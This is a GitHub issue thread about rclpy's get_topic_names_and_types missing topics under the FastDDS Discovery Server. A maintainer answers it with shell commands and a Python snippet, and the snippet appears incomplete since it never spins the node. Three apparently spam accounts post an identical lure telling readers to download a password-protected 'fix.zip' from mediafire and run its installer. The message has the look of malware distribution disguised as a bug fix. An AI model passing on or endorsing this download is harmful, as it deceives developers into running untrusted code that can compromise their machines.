ros2/ros2 #1596: get_topic_names_and_types can not access topic list with FastDDS Discovery Server

RPRKLR, 2024-08-26:
## Bug report

**Required Info:**
While using FastDDS Discovery Server with python, I want to create a type and topic name check to see if the topic is existing. For that I am using the get_topic_names_and_types() function. 

- Operating System:
  - Ubuntu 22.04
- Installation type:
  - Binary
- Version or commit hash:
  - Iron
- DDS implementation:
  - FastDDS Discovery Server
- Client library (if applicable):
  - rclpy

#### Steps to reproduce issue

After staring up the Discovery Server, I start up my node, which contains the following line
```
topic_info = self._node.get_topic_names_and_types()
```

#### Excepted behavior
When I call the function I should see the requested topic.

#### Actual behavior 
I can not see any topic except `/rosout` and `/parameter_events`.

#### Additional information
I am using a SUPER_CLIENT, and I can see all the available topics. Without Discovery server, I can see the requested topic inside the list of topics.

Qsgz2023ji5ban, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

MoonShadowIllusion, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

NhutDang2002, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

MiguelCompany, 2024-08-26:
@RPRKLR Using a `SUPER_CLIENT` is required for your use case. An easy way is setting both [`ROS_SUPER_CLIENT=TRUE`](https://fast-dds.docs.eprosima.com/en/v2.10.3/fastdds/env_vars/env_vars.html#ros-super-client) environment variable along with [`ROS_DISCOVERY_SERVER`](https://fast-dds.docs.eprosima.com/en/v2.10.3/fastdds/env_vars/env_vars.html#ros-discovery-server)

MiguelCompany, 2024-08-26:
@RPRKLR

I tried with `ros2 topic list` and it worked. If I am not mistaken it uses `get_topic_names_and_types` internally.

Terminal 1: 
```bash
fastdds discovery -i 0
```

Terminal 2:
```bash
export ROS_DISCOVERY_SERVER="localhost:11811"
export ROS_SUPER_CLIENT=TRUE
ros2 topic pub -r 100 test std_msgs/String "{data: asdf}"
```

Terminal 3:
```bash
export ROS_DISCOVERY_SERVER="localhost:11811"
export ROS_SUPER_CLIENT=TRUE
ros2 topic list
```

This gave the following result:
```
/parameter_events
/rosout
/test
```

Do you have a reproducer that we can test?

MiguelCompany, 2024-08-26:
@RPRKLR

It seems you need to spin the node, in order to give it time to communicate with the server.
The following code works for me:

```python
import rclpy
from rclpy.node import Node

class TestFunc(Node):

    def __init__(self):
        super().__init__('test_topic_names')
        list = self.get_topic_names_and_types()
        self.get_logger().info(f"list: {list}")

def main(args=None):
    timeout_reached = False

    rclpy.init(args=args)

    test_func = TestFunc()

    def timer_callback():
        nonlocal timeout_reached
        timeout_reached = True

    timer = test_func.create_timer(1, timer_callback)

```

RPRKLR, 2024-08-26:
@MiguelCompany 
It solves the issue, thank you for your help!

closed 2024-08-26 by RPRKLR